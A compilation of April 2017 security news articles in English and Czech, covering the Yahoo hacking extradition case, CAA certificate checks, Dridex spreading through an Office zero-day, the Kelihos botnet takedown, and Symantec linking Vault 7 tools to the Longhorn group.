A Canadian court on Tuesday denied bail to a man accused of carrying out devastating cyberattacks on Yahoo as he awaits possible extradition to the United States to face criminal charges.
Karim Baratov, 22, an immigrant from Kazakhstan, was arrested on a US warrant in March for alleged hacking, commercial espionage and related crimes.
His lawyers said they will fight the extradition request. A hearing could begin as early as June and the process of deciding whether to extradite Baratov is expected to last up to three years.
US authorities alleged Russian intelligence agents hired Baratov and another hacker to carry out attacks on Yahoo from 2014 to 2016.
The data breach compromised 500 million Yahoo accounts and is one of the largest cyberattacks in history. Targets included Russian and US government officials, cyber security, diplomatic and military personnel, journalists, companies and financial firms.
Baratov's lawyers had asked that he be remanded into his parents' custody. His father vowed strict supervision at home, telling the court: "Jail would look like paradise."
But prosecutors said Baratov has ties to foreign spies and posed a flight risk, noting that one of his co-accused in the case fled to Russia. amc/dw
Mandatory Certificate Authority Authorization Checks Will Boost Domain Security
12.4.2017 securityweek Safety
The issuance of SSL/TLS (Secure Sockets Layer/Transport Layer Security) certificates is expected to become a more secure process this September, after the implementation of mandatory Certificate Authority Authorization (CAA) checks.
After Certificate Authorities (CAs) and browser makers voted last month to make CAA checking mandatory, the new standard will be implemented starting September 8, 2017, according to Ballot 187 on the CA/Browser Forum site. Starting then, all CAs will have to check CAA records at issuance time for all certificates, which should prevent them from issuing certificates if not permitted to.
CAA is a DNS Resource Record that “allows a DNS domain name holder to specify one or more Certification Authorities (CAs) authorized to issue certificates for that domain and, by implication, that no other CAs are authorized.”
Domain owners will be able to set an issuance policy that all publicly-trusted CAs should comply with, thus preventing CAs from wrongfully issuing HTTPS certificates. This new standard should also mitigate the issue that “the public CA trust system is only as strong as its weakest CA,” Ballot 187 also reveals.
CAs will have to check “for a CAA record for each dNSName in the subjectAltName extension of the certificate to be issued.” This standard, however, doesn’t prevent CAs to check CAA records at any other time.
Apparently, CAA checking isn’t required in specific scenarios, such as for “certificates for which a Certificate Transparency pre-certificate was created and logged in at least two public logs, and for which CAA was checked.”
If the CA or an Affiliate of the CA is the DNS Operator of the domain’s DNS, CAA checking becomes optional, the same as “for certificates issued by a Technically Constrained Subordinate CA Certificate as set out in Baseline Requirements section 7.1.5, where the lack of CAA checking is an explicit contractual provision in the contract with the Applicant.”
CAs are also required to document potential issuances that were prevented by the CAA, and should also send reports of the requests to the contact(s) stipulated in the CAA iodef record(s), if present.
17 out of 19 voting CAs (94%) voted in favor of the new CAA standard. All three participating browser makers (Mozilla, Google, and Apple) voted in favor.
Dridex Attacks Exploit Recent Office 0-Day
11.4.2017 securityweek Exploit
A recently revealed zero-day vulnerability in Microsoft Office is being exploited by the Dridex banking Trojan to compromise unsuspecting victims’ computers, Proofpoint security researchers warn.
Detailed recently by McAfee and FireEye, the zero-day allows an attacker to achieve code execution on compromised machines. Leveraging Office’s Object Linking and Embedding (OLE) functionality, an attacker could create a malicious RTF (Rich Text Format) document that links to an HTA (HTML Application) file hosted on remote servers, which in turn executes a malicious Visual Basic script.
According to Proofpoint, the vulnerability is currently being exploited in malicious documents that millions of recipients across various organizations primarily in Australia have received via email, and which eventually led to the Dridex Trojan being installed on the compromised system.
The campaign features messages supposedly coming from “<[device]@[recipient's domain]>”, where [device] could be “copier”, “documents”, “noreply”, “no-reply”, or “scanner.” All emails use “Scan Data” as subject line, while the attached Microsoft Word RTF document is named “Scan_xxxx.doc” or “Scan_xxxx.pdf.”
“Note that while this campaign does not rely on sophisticated social engineering, the spoofed email domains and common practice of emailing digitized versions of documents make the lures fairly convincing,” Proofpoint says.
When the malicious document is opened, the exploit carries out a series of operations that eventually result in Dridex botnet ID 7500 being installed on the victim’s system. The security researchers noticed that the exploit worked without user interaction: the system was compromised even if the user was presented a dialog about the document containing “links that may refer to other files.”
The particular instance of Dridex distributed as part of this infection campaign was observed using over 100 injects for known banks and for various other popular applications and online destinations.
“Although document exploits are being used less frequently in the wild, with threat actors favoring social engineering, macros, and other elements that exploit "the human factor," this campaign is a good reminder that actors will shift tactics as necessary to capitalize on new opportunities to increase the effectiveness of their efforts,” Proofpoint says.
Hackers Targeting Amazon Third-Party Sellers With Password Reuse Attacks
11.4.2017 securityweek Hacking
Cyber criminals are re-using stolen passwords to access the accounts of third-party sellers on Amazon. They then change the bank account details and simply redirect customer payments to their own bank accounts. Where they find an old and disused account, they promote non-existent deals with heavy discounts, and again divert the proceeds to their own bank account. It should be noted that this is not an attack against Amazon users, but against Amazon third-party sellers.
It would be wrong to say that Amazon is being hacked. Legitimate passwords are being used to access legitimate accounts. These passwords come from the billions of stolen passwords available on the internet. Where there is a fault, it is in users' continued tendency to use the same password across multiple accounts; and to rarely, if ever, change them.
The only real difficulty for the criminals is matching the stolen and reused password to the Amazon account -- and this is not hard. Since almost all services employ the user's email address as the username, it is merely a question of locating a third-party seller, finding the seller's email address, and trying the associated password from the list of stolen passwords. "The attackers are mining the rich seam of stolen credentials publicly dumped or traded in underground forums," ESET senior research fellow David Harley told SecurityWeek. "That way, they only need to match known credentials to Amazon account holders."
Even if the seller's email address is not known, it could possibly be obtained from Amazon itself. "If Amazon is the weak spot, perhaps the registration page?" suggested Sean Sullivan, security advisor at F-Secure. "The 'Create account' page looks like something that could be targeted with a list of addresses, from which could easily be noted those to result in a message of 'email is already in use'. Then you have addresses to try on the sign-in page."
The basic password problem was highlighted in a recent study by Thycotic, which found that even security professionals reuse passwords, use weak passwords, and don't change them over long periods of time. A password stolen from Yahoo years ago might well provide access to other accounts today -- including Amazon.
The result, according to the Wall Street Journal, is that some sellers are losing thousands of dollars. "CJ Rosenbaum, a New York-based lawyer who represents Amazon sellers, says that more than a dozen of his clients have recently called to tell him they were hacked, a number of whom lost about half of their monthly sales of $15,000 to $100,000. They are asking Amazon for their money back, Mr. Rosenbaum said."
WSJ also reports that "some sellers say the hacks have shaken their confidence in Amazon's security measures." This isn't entirely fair -- all users should do more to protect their passwords: strong, unique passwords that are regularly changed. And wherever possible, two-factor options should be employed.
"It is critical for Amazon resellers to take advantage of Amazon's two-factor authentication to prevent this type of hijacking and phishing activity," comments Sophos' principal research scientist Chet Wisniewski. "All Amazon users should take advantage of this feature, but considering what third party resellers have at risk it is even more important. The easiest method to enable uses a time-oriented token you can load for free on your Android or iOS smartphone. The most popular app to use for this is Google's Authenticator app." Sophos has its own option that can be installed on Android or iOS and enabled in the Amazon or AWS account.
This is not to say that Amazon could not do more to protect its customers. In the desire to make things as easy as possible for customers, services like Amazon (and including almost all services from other ecommerce sites to social networks) do not enforce good password practices. Two-factor authentication is rarely required, and users are not forced to change passwords regularly. The bottom line, however, is that users need to better understand how to generate strong, unique passwords; and to regularly change them.
OWASP Proposes New Vulnerabilities for 2017 Top 10
11.4.2017 securityweek Vulnerebility
OWASP Top 10 - 2017 RC1-English.pdf
The Open Web Application Security Project (OWASP) announced on Monday the first release candidate for the 2017 OWASP Top 10, which proposes two new vulnerability categories.
The new categories proposed for OWASP Top 10 - 2017 are “insufficient attack detection and prevention” and “unprotected APIs.”
OWASP wants to make room for the “unprotected APIs” category by dropping “unvalidated redirects and forwards,” the 10th item on the current (2013) list, which was added to the top 10 in 2010.
The new insufficient attack protection category would be added to the 7th position. OWASP wants to make room for it by merging the current 4th and 7th items, namely insecure direct object references with missing function level access control. The organization has proposed the merger of the two old categories into “broken access control”, as it was back in 2004.
OWASP has provided the following description for the insufficient attack protection category: “The majority of applications and APIs lack the basic ability to detect, prevent, and respond to both manual and automated attacks. Attack protection goes far beyond basic input validation and involves automatically detecting, logging, responding, and even blocking exploit attempts. Application owners also need to be able to deploy patches quickly to protect against attacks.”
In a discussion on Reddit, several users said “insufficient attack protection” should not be classified as a flaw. It remains to be seen if enough users agree to make OWASP change its mind about creating a new category for it.
As for the unprotected APIs category, OWASP says, “Modern applications often involve rich client applications and APIs, such as JavaScript in the browser and mobile apps, that connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, etc.). These APIs are often unprotected and contain numerous vulnerabilities.”
Comments on the 2017 Top 10 proposal can be submitted via email until June 30 to OWASP-TopTen(at)lists.owasp.org, or dave.wichers(at)owasp.org (for private comments). The final version will be released in either July or August.
Mirai Variant Has Bitcoin Mining Capabilities
11.4.2017 securityweek IoT
A newly observed variant of the Mirai malware is abusing infected Internet of Things (IoT) devices for Bitcoin crypto-currency mining, IBM X-Force security researchers warn.
Initially spotted in September last year, Mirai was designed to find insecure IoT devices and ensnare them into a botnet primarily used for launching DDoS (distributed denial of service) attacks. Variants of the malware started to emerge after the Trojan’s source code was leaked, and a Windows variant designed to spread the Linux version was spotted earlier this year.
The newest variant moves beyond the initial DDoS capabilities of the botnet, with the addition of a component focused on Bitcoin mining. This crypto-currency has doubled in price over the past half year, trading at more than $1,290 per unit this March, above the November 2013 high of $1,242.
The Bitcoin mining-capable Mirai variant was observed in a short-lived, high-volume campaign at the end of March, targeting Linux machines running BusyBox. The attack focuses on devices such as DVR servers, which usually feature BusyBox with default Telnet credentials that Mirai targets with a dictionary attack brute-force tool.
In addition to the various types of attacks that Mirai bots can perform, such as TCP, UDP, and HTTP floods, the new variant also turns the compromised devices into Bitcoin miner slaves. Because IoT devices usually lack computing power, they can’t create Bitcoins, at least not on their own.
“Given Mirai’s power to infect thousands of machines at a time, however, there is a possibility that the bitcoin miners could work together in tandem as one large miner consortium. We haven’t yet determined that capability, but we found it to be an interesting yet concerning possibility. It’s possible that while the Mirai bots are idle and awaiting further instructions, they could be leveraged to go into mining mode,” IBM explains.
IBM researchers found the Mirai dropper in a web console and associated the site to a series of high-volume command injection attacks. They also determined that the website was used as a malware package archive repository and that it was also counting infected victims in real-time. What’s more, the file package also included a Dofloo backdoor and a Linux shell.
Mirai is only one of the malware families to have adopted crypto-currency mining lately, after the Sundown exploit kit started distributing a Monero miner several months ago. Last year, researchers discovered a Go-based Linux Trojan focused on Monero mining.
Cisco Finds Many Flaws in Moxa Industrial APs
11.4.2017 securityweek Vulnerebility
Cisco’s Talos intelligence and research group has conducted a two-week analysis of an industrial wireless access point (AP) from Taiwan-based Moxa and discovered more than a dozen vulnerabilities, including ones that can be exploited to take full control of a device.
A blog post published by Talos on Monday describes the vulnerabilities found by researchers during their tests. All of the flaws have been addressed by Moxa, except for one critical weakness, whose details will not be disclosed until a patch becomes available.
Experts focused on Moxa’s AWK-3131A AP, which is recommended for any type of industrial wireless application.Moxa AP vulnerabilties
On the first day of testing, researchers identified the services available on the BusyBox-powered device, including SSH (Dropbear), Telnet, HTTP and HTTPS. Talos said Moxa agreed to share the source code of its BusyBox implementation for proper analysis.
Researchers first identified some authentication issues that made it easy for attackers to launch dictionary attacks against the web interface’s login page, and flaws that allowed hackers to hijack user sessions.
On the third day of the investigation, researchers discovered many cross-site scripting (XSS) vulnerabilities in the front-end of the web interface. These flaws can be exploited to hijack user sessions and gain access to the web interface.
Once they are authenticated, attackers can exploit one of the several command injection vulnerabilities in order to gain full control of the targeted AP.
Several of the security holes found by Talos can allow malicious actors to obtain potentially valuable information without any authentication, including passwords, firewall rules and network configuration data.
Experts have also uncovered a denial-of-service (DoS) vulnerability that can be exploited remotely to crash the web application.
On the last day of testing, researchers identified several cryptography-related issues. Specifically, they determined that the Moxa AP used an outdated version of OpenSSL (1.0.0d from 2011) and it had been vulnerable to attacks such as POODLE and DROWN.
“Our research demonstrates how many vulnerabilities can be quickly discovered by analyzing a device,” Talos researchers said. “There is nothing to suggest that this device is more or less vulnerable than any other. Indeed, the vulnerabilities we discovered are exactly the types of vulnerabilities likely to be discovered on any ICS device.”
U.S. Takes Down Kelihos Botnet After Its Russian Operator Arrested in Spain
11.4.2017 thehackernews BotNet
A Russian computer hacker arrested over the weekend in Barcelona was apparently detained for his role in a massive computer botnet, and not for last year's US presidential election hack as reported by the Russian media.
Peter Yuryevich Levashov, 32-years-old Russian computer programmer, suspected of operating the Kelihos botnet — a global network of over 100,000 infected computers that was used to deliver spam, steal login passwords, and infect computers with ransomware and other types of malware since approximately 2010, the U.S. Justice Department announced Monday.
As suspected earlier, Levashov, also known as Peter Severa, is the same man who has also been listed in the World's Top 10 Worst Spammers maintained by anti-spam group Spamhaus, which has given him the 7th position in the list.
The arrest was made possible after the FBI learned just last month that Levashov was traveling with his family to Spain from his home in Russia, a country without any extradition treaty to the United States.
Initially, it was believed that Levashov was detained on suspicion of 2016 US election hack, after his wife told Russian publication RT that authorities said her husband’s apprehension was in part due to his involvement in the U.S. election hacking, including the notorious breach of the Democratic National Committee (DNC).
However, the DoJ press release indicates no link between Levashov and US election hack at all.
Instead, Levashov was linked to the Kelihos botnet by the FBI because he used the same IP address to operate the botnet that he used to access his email and other online accounts in his name, including Apple iCloud and Google Gmail accounts.
According to the indictment unsealed Monday, Levashov operated the botnet since 2010, targeting Microsoft Windows machines for infection. He allegedly used Kelihos to distribute hundreds of millions of spam emails per year, and pump-and-dump stock scams.
Besides conducting spamming operations, prosecutors also alleged Levashov also used the Kelihos botnet to infect end-user computers with malware and harvest passwords to online and bank accounts belonging to thousands of Americans.
"The ability of botnets like Kelihos to be weaponized quickly for vast and varied types of harms is a dangerous and deep threat to all Americans, driving at the core of how we communicate, network, earn a living, and live our everyday lives," said Acting Assistant Attorney General Blanco.
"Our success in disrupting the Kelihos botnet was the result of strong cooperation between private industry experts and law enforcement, and the use of innovative legal and technical tactics."
The FBI officials obtained court orders (Rule 41 of the Federal Rules of Criminal Procedure) to redirect Kelihos-infected PCs to servers operated by authorities — a process known as "Sinkhole attack" — and to block any attempts by the botnet to regain control of those sinkholed computers.
The FBI said it worked with security firm CrowdStrike and Shadowserver Foundation, a volunteer group of information security experts, to deploy the sinkhole attack to disconnect communications between criminals and infected computers.
Levashov has been charged with wire fraud and unauthorized interception of electronic communications. The government is now seeking his extradition to the United States.
Unpatched Microsoft Word Flaw is Being Used to Spread Dridex Banking Trojan
11.4.2017 thehackernews Vulnerebility
If you are a regular reader of The Hacker News, you might be aware of an ongoing cyber attack — detected in the wild by McAfee and FireEye — that silently installs malware on fully-patched computers by exploiting an unpatched Microsoft Word vulnerability in all current versions of Microsoft Office.
Now, according to security firm Proofpoint, the operators of the Dridex malware started exploiting the unpatched Microsoft Word vulnerability to spread a version of their infamous Dridex banking trojan.
Dridex is currently one of the most dangerous banking trojans on the Internet that exhibits the typical behavior of monitoring a victim's traffic to bank sites by infiltrating PCs and stealing victim's online banking credentials and financial data.
The Dridex actors usually relied on macro-laden Word files to distribute the malware through spam messages or emails.
However, this is the first time when researchers found the Dridex operators using an unpatched zero-day flaw in Microsoft Word for distributing their banking trojan.
According to a blog post published Monday night by Proofpoint, the latest Dridex spam campaign is delivering Word documents weaponized with this zero-day to millions of recipients across several organizations, including banks primarily located in Australia.
"Emails in this campaign used an attached Microsoft Word RTF (Rich Text Format) document. Messages purported to be from "[device]@[recipient's domain]." [Device] may be "copier", "documents", "noreply", "no-reply", or "scanner"," Proofpoint researchers say.
"The subject line in all cases read "Scan Data" and included attachments named "Scan_123456.doc" or "Scan_123456.pdf", where "123456" was replaced with random digits...the spoofed email domains and the common practice of emailing digitized versions of documents make the lures fairly convincing."
As we reported on Saturday, this zero-day flaw is severe because it gives hackers power to bypass most exploit mitigations developed by Microsoft, and unlike past Word exploits seen in the wild, it doesn't require victims to enable Macros.
Moreover, given the danger of Dridex – also known as Bugat and Cridex – banking trojan, people are strongly advised not to open Word documents attached to an email from anyone, even if you know the sender until Microsoft releases a patch.
Microsoft knew of the flaw very long ago
According to researchers at McAfee and FireEye, Microsoft has known of the remote code flaw since January and could release a patch for the vulnerability today, as part of its regular Patch Tuesday routine.
However, an independent security researcher Ryan Hanson claimed that he discovered this 0-day, along with the two other flaws, in July and reported it to Microsoft in October 2016.
"The initial discovery was in July, which was followed up by additional research and the identification of a protected view bypass vulnerability. Those two bugs and an additional Outlook bug were submitted to MS in October," Hanson told The Hacker News.
"There may very well be additional HTA related vectors in Office, but based on the detail provided by McAfee, the vulnerability they've identified functions exactly like the one I disclosed. The only difference I see is the VBScript payload, since my payload simply executed calc.exe."
If the claims made by Hanson is true and his reported vulnerability is the same being used in the wild to spread Dridex, Microsoft left its customers vulnerable to the attacks even after being known of the critical flaw for quite long.
Enable 'Protected View' in Microsoft Office to Prevent Attack
Since the attack does not work when a malicious document is viewed in Office Protected View, users are advised to enable this feature in order to view any Office documents.
For more technical details about the latest Dridex malware campaign exploiting the unpatched Microsoft Word flaw, you can head on to the blog post published by Proofpoint.
Španělsko zatklo Rusa podezřelého z ovlivňování voleb v USA
11.4.2017 Novinky/Bezpečnost Kriminalita
Španělská policie zatkla v Barceloně ruského programátora, jehož americký Federální úřad pro vyšetřování (FBI) podezírá z účasti na ovlivňování loňských prezidentských voleb v USA. Podle deníku El País v pondělí španělský soud potvrdil, že šestatřicetiletý Pjotr Levašov je ve vězení a čeká na rozhodnutí o vydání do Spojených států.
Domnělý ruský hacker, který podle ruské televize RT pochází z Petrohradu, byl zatčen před několika dny v Barceloně. Ruská televize rovněž uvedla, že Levašov byl ve Španělsku na dovolené s manželkou a synem.
„Mluvila jsem se svým manželem po telefonu. Prý mu řekli, že vytvořil počítačový virus, který měl ´něco společného s volebním vítězstvím Trumpa´”, uvedla podle listu El País Marija Levašovová. Dodala, že jejího manžela zatkli na základě amerického zatykače, který ho viní z účasti na kyberšpionáži Ruska ve prospěch Donalda Trumpa.
Měl provozovat botnet Kelihos
Údajnou tajnou předvolební spolupráci týmu současného prezidenta Donalda Trumpa s Ruskem vyšetřuje několik výborů amerického Kongresu. FBI a Národní agentura pro bezpečnost (NSA) se domnívají, že Rusko se snažilo poškodit demokratickou kandidátku Hillary Clintonovou a dopomoci ke zvolení jejímu republikánskému sokovi Trumpovi.
Levašov podle amerického ministerstva spravedlností zhruba od roku 2010 provozoval celosvětovou síť infikovaných počítačů, takzvaný botnet. Levašova síť nese název Kelihos a její součástí se postupně staly desítky tisíc počítačů s operačním systémem Windows od Microsoftu. Ministerstvo spravedlnosti dnes podle agentury Reuters oznámilo, že spustilo akci na zničení botnetu Kelihos. Součástí akce je vytvoření serverů, které budou ovládací příkazy vysílané směrem k nakaženým počítačům blokovat.
Pozor na novou várku e-mailů od „České spořitelny“. Mohou nakazit počítač
11.4.2017 Cnews.cz Phishing
Na e-mailové schránky českých surfařů se valí nová vlna podvodných e-mailů. Tentokrát se tváří jako poslané od České spořitelny. Odpovídá tomu podpis ve zprávě i adresa odesílatele. Ta však není zárukou ničeho, lze ji snadno zfalšovat.
Česká spořitelna varuje, že e-mail obsahuje malware skrytý v příloze formátu JAR (java aplikace). Už ale neříká, co přesně se stane po otevření, jak malware působí. Samotný text e-mailu by však měl být dostatečným varováním. Takhle neosobně zaslanou zprávu by si žádná banka nedovolila.
Nový podvodný mail vydávající se za Českou spořitelnu
WikiLeaks CIA Files Linked to Espionage Group
11.4.2017 securityweek BigBrothers
Researchers at Symantec have analyzed the Vault 7 files published in recent weeks by WikiLeaks and determined that they are very similar to ones used by a cyberespionage group tracked by the security firm as “Longhorn.”
The Vault 7 leaks cover exploits and tools allegedly used by the U.S. Central Intelligence Agency (CIA) to hack a wide range of systems, including PCs, Macs, mobile devices and IoT products. Based on an analysis of the files, Symantec is fairly confident that some of the Vault 7 documents describe the tools and techniques used by Longhorn.
According to the security firm, Longhorn is a threat group that has been around since at least 2011, but possibly as early as 2007. Symantec has been tracking the APT since 2014, when it used a Windows zero-day exploit (CVE-2014-4148) to deliver a backdoor called Plexor.
Researchers have observed Longhorn attacks aimed at more than 40 targets across 16 different countries in Europe, Asia (Middle East and other regions) and Africa. The list of targets includes governments, international organizations, and companies in the telecoms, financial, aerospace, energy, IT, education, and national resources sectors. Symantec pointed out that all of the targeted entities could present an interest to a nation-state actor.
An analysis of Longhorn’s tools and working hours suggests that the group is located in North America and its members are English speakers.
The CIA has neither confirmed nor denied that the Vault 7 files are authentic. The agency said its mission is to collect foreign intelligence from overseas entities, and pointed out that it is legally prohibited from spying on Americans.
Symantec noted that it did detect one Longhorn malware infection in the United States, but an uninstaller was launched within hours, which could indicate that the computer had been infected unintentionally.
In addition to Plexor, Longhorn has used several other pieces of malware in its operations, including Trojans dubbed Corentry, LH1 and LH2.
Corentry’s development timeline coincides with the dates mentioned in a changelog file published by WikiLeaks for a tool called Fluxwire. Experts also determined that the Plexor backdoor is very similar to a tool named in the Vault 7 documents “Fire and Forget.”
Researchers also found similarities between the cryptographic protocols described in the Vault 7 files and the ones used by Longhorn.
“Other Vault 7 documents outline tradecraft practices to be used, such as use of the Real-time Transport Protocol (RTP) as a means of command and control (C&C) communications, employing wipe-on-use as standard practice, in-memory string de-obfuscation, using a unique deployment-time key for string obfuscation, and the use of secure erase protocols involving renaming and overwriting. Symantec has observed Longhorn tools following all of these practices,” the security firm said in a blog post.
If confirmed, Longhorn would be the second cyber espionage group whose activities have been tied to the U.S. government. The first was the NSA-linked Equation Group, whose mistakes were analyzed by the individuals who developed the Vault 7 tools.
Symantec confirms that Longhorn group is tied to CIA operators detailed in Vault 7
11.4.2017 securityaffairs BigBrothers
Symantec reportedly linked the CIA hacking tools to several cyber attacks powered over the years by the Longhorn group.
Security experts who analyzed the alleged CIA hacking tools included in the Vault 7 dump have been used against at least 40 governments and private organizations across 16 countries.
Researchers at company firm Symantec reportedly linked the CIA hacking tools to a number of cyber attacks launched in recent years by a threat actor the company identified as the Longhorn group.
“Spying tools and operational protocols detailed in the recent Vault 7 leak have been used in cyberattacks against at least 40 targets in 16 different countries by a group Symantec calls Longhorn. Symantec has been protecting its customers from Longhorn’s tools for the past three years and has continued to track the group in order to learn more about its tools, tactics, and procedures.” reads the analysis published by Symantec.
“The tools used by Longhorn closely follow development timelines and technical specifications laid out in documents disclosed by WikiLeaks.”
Symantec believes Longhorn is a North American hacking group that has been active since at least 2011. The group is very sophisticated and used zero-day exploits and complex malware to conduct targeted attacks against governments and organizations in almost every industry, including financial, energy, telecommunications and education, aerospace.
The Longhorn group is a well-resourced hacking team that operated on a standard Monday to Friday working week in an American time zone. The nature of the targets and its Techniques, Tactics, and Procedures (TTPs) suggests the Longhorn group is a state-sponsored crew.
The targets were all in located in the Middle East, Europe, Asia, and Africa. On one case, the researchers observed the Longhorn group compromising a computer in the US, following infection, an uninstaller was quickly executed, which demonstrates that this victim was infected unintentionally.
“The Longhorn group shares some of the same cryptographic protocols specified in the Vault 7 documents, in addition to following leaked guidelines on tactics to avoid detection.” continues Symantec. “Given the close similarities between the tools and techniques, there can be little doubt that Longhorn’s activities and the Vault 7 documents are the work of the same group.” continues Symantec.
Digging the precious Vault 7 archive the experts discovered the Fluxwire cyber espionage malware. The documents related to this malware include a changelog of dates for when new features were added to the malicious code, the features, the timeline are coherent with the development cycle of the Corentry malware created by Longhorn APT.
“These dates align closely with the development of one Longhorn tool (Trojan.Corentry) tracked by Symantec. New features in Corentry consistently appeared in samples obtained by Symantec either on the same date listed in the Vault 7 document or several days later, leaving little doubt that Corentry is the malware described in the leaked document.” reads Symantec.
“Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file. The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0.”
“Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler.”
A second document in the Vault 7 archive details Fire and Forget, a specification for user-mode injection of a payload by a tool called Archangel.
The specification of the malicious code and the interface used to load it matches the Longhorn tool called Backdoor.Plexor.
The experts discovered many other similarities, another leaked CIA document outlined cryptographic protocols that should be implemented in the malware development.
“A third document outlines cryptographic protocols that malware tools should follow. These include the use of inner cryptography within SSL to prevent man-in-the-middle (MITM) attacks, key exchange once per connection, and use of AES with a 32-bit key. These requirements align with the cryptographic practices observed by Symantec in all of the Longhorn tools.” continues Symantec.
another Vault 7 document recommends using of in-memory string de-obfuscation and Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.
All the above techniques and protocols were implemented in all the hacking tools of the Longhorn group.
Researchers from Symantec discovered a number of indicators that confirm Longhorn was from an English-speaking, North American country.
“The acronym MTWRFSU (Monday Tuesday Wednesday ThuRsday Friday Saturday SUnday) was used to configure which day of the week malware would communicate with the attackers. This acronym is common in academic calendars in North America.” reads Symantec.”Some of the code words found in the malware, such as SCOOBYSNACK, would be most familiar in North America. In addition to this, the compilation times of tools with reliable timestamps indicate a time zone in the Americas.”
Summarizing, there is no doubt Longhorn group has the same abilities and hacking tools of the CIA operators documented in the Vault 7 documents.
Symantec Connects 40 Cyber Attacks to CIA Hacking Tools Exposed by Wikileaks
11.4.2017 thehackernews BigBrothers
Security researchers have confirmed that the alleged CIA hacking tools recently exposed by WikiLeaks have been used against at least 40 governments and private organizations across 16 countries.
Since March, as part of its "Vault 7" series, Wikileaks has published over 8,761 documents and other confidential information that the whistleblower group claims came from the US Central Intelligence Agency (CIA).
Now, researchers at cybersecurity company Symantec reportedly managed to link those CIA hacking tools to numerous real cyber attacks in recent years that have been carried out against the government and private sectors across the world.
Those 40 cyber attacks were conducted by Longhorn — a North American hacking group that has been active since at least 2011 and has used backdoor trojans and zero-day attacks to target government, financial, energy, telecommunications, education, aerospace, and natural resources sectors.
Although the group's targets were all in the Middle East, Europe, Asia, and Africa, researchers said the group once infected a computer in the United States, but an uninstaller was launched within an hour, which indicates the "victim was infected unintentionally."
What's interesting is that Symantec linked some of CIA hacking tools and malware variants disclosed by Wikileaks in the Vault 7 files to Longhorn cyber espionage operations.
Fluxwire (Created by CIA) ≅ Corentry (Created by Longhorn)
Fluxwire, a cyber espionage malware allegedly created by the CIA and mentioned in the Vault 7 documents, contains a changelog of dates for when new features were added, which according to Symantec, closely resemble with the development cycle of "Corentry," a malware created by Longhorn hacking group.
"Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file," Symantec explains. "The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0."
"Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler."
Similar Malware Modules
Another Vault 7 document details 'Fire and Forget' specification of the payload and a malware module loader called Archangel, which Symantec claims, match almost perfectly with a Longhorn backdoor called Plexor.
"The specification of the payload and the interface used to load it was closely matched in another Longhorn tool called Backdoor.Plexor," says Symantec.
Use of Similar Cryptographic Protocol Practices
Another leaked CIA document outlined cryptographic protocols that should be used within malware tools, such as using AES encryption with a 32-bit key, inner cryptography within SSL to prevent man-in-the-middle attacks, and key exchanges once per connection.
One leaked CIA document also recommends using of in-memory string de-obfuscation and Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.
According to Symantec, these cryptographic protocol and communication practices were also used by Longhorn group in all of its hacking tools.
More About LongHorn Hacking Group
Longhorn has been described as a well-resourced hacking group that works on a standard Monday to Friday working week — likely a behavior of a state-sponsored group — and operates in an American time zone.
Longhorn's advanced malware tools are specially designed for cyber espionage with detailed system fingerprinting, discovery, and exfiltration capabilities. The group uses extremely stealthy capabilities in its malware to avoid detection.
Symantec analysis of the group's activities also shows that Longhorn is from an English speaking North American country with code words used by it referring, the band The Police with code words REDLIGHT and ROXANNE, and colloquial terms like "scoobysnack."
Overall, the functionality described in the CIA documents and its links to the group activities leave "little doubt that Longhorn's activities and the Vault 7 documents are the work of the same group."
US Takes Down Huge Botnet as Spain Arrests Notorious Russian Hacker
11.4.2017 securityweek BotNet
U.S. Authorities Take Down Kelihos Botnet as Alleged Creator is Arrested in Spain
US authorities moved Monday to take down a global computer botnet behind the massive theft of personal data and unwanted spam emails, as Spain arrested the notorious Russian hacker who operated it.
US authorities say the Russian, Piotr or Peter Levashov, had operated the Kelihos network of tens of thousands of infected computers, stealing personal data and renting the network out to others to send spam emails by the millions and extort ransom from computer owners.
Levashov, also known in the hacking world as Peter Severa, was arrested at Barcelona airport on Friday at the US request.
A Spanish judge on Monday ordered him to be remanded in custody as Washington is expected to seek his extradition.
Spanish police said in a statement late Monday that the arrest was the result of a "complex inquiry carried out in collaboration with the American FBI."
A US indictment unsealed Monday said Levashov, 36 and a native of St. Petersburg, had operated the Kelihos botnet since around 2010.
It was not the first time US officials have gone after him. In 2008 he was indicted as a Russia-based partner of the leading US spammer, Alan Ralsky. Ralsky and others were jailed in that case but Levashov was never caught.
100,000 computers infected
The Kelihos network is made up of private computers around the world running on the Microsoft Window operating system. The computers are infected with malware that gives Levashov the ability to control them remotely, with the owners completely unaware.
According to the Justice Department, at times the number of computers in the network has topped 100,000, with between five and 10 percent of them in the United States.
Through underground networks, Kelihos sold the network's services to others, who would use it to send out spam emails advertising counterfeit drugs, work-at-home scams, and other fraud schemes, the indictment said.
They were also used for illegal "pump-and-dump" stock market manipulation schemes, and to spread other malware through which hackers could steal a user's banking account information including passwords, and lock up a computer's information to demand huge ransoms.
The indictment called Levashov "one of the world's most notorious criminal spammers."
The Spamhaus Project, which documents spam, botnets, malware and other abuse, listed him as seventh on its "10 Worst Spammers" list and "one of the longest operating criminal spam-lords on the internet."
"The ability of botnets like Kelihos to be weaponized quickly for vast and varied types of harms is a dangerous and deep threat to all Americans, driving at the core of how we communicate, network, earn a living, and live our everyday lives," said Acting US Assistant Attorney General Kenneth Blanco in a statement.
Using legal 'malware' against botnet
Levashov's arrest was unrelated to investigations into Russian interference in last year's US presidential election, US officials said.
Earlier, the suspect's wife had earlier told Russia Today that his arrest was connected to the election hacking case.
A Spanish court specializing in international cases will rule on whether he will be sent to the US.
The US has 40 days to present evidence backing Levashov's extradition, which the suspect opposes.
